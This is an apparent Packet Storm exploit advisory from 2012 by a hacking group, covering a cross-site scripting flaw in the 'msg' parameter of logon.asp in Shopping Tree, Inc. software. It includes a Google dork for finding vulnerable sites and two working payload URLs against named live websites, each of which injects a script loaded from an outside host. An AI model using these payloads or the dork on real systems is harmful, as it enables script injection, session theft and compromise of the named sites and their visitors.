Shopping Tree, Inc. software suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
710c6c5f6d8a0112ff32d4cd35417f5a21917d22421ec5fcd825351690c94a00###########################################################################################################################################
# Exploit Title: Shopping Tree Cross Site Scripting
# Google Dork: "Shopping Tree, Inc"
# Date: 14/08/2012
# Author: Iranian_Dark_Coders_Team
# Discovered By : Nafsh
# Site : http://idc-team.net/
# Software Link: http://www.shoppingtree.com
##########################################################################################################################################
# Bug : /logon.asp?msg= [Xss]
###########################################################################################################################################
# Example :
#
# http://www.refuah.co.il/admin/logon.asp?msg=%22%3E%3Cscript%20src%3d//santanafest.com.br/enquete/c%3E%3C/script%3E
# www.islam1.co/hatahet1/logon.asp?msg=%22%3E%3Cscript%20src%3d//santanafest.com.br/enquete/c%3E%3C/script%3E
###########################################################################################################################################
# Special Thanks To : All Of IDC-Team Members
###########################################################################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed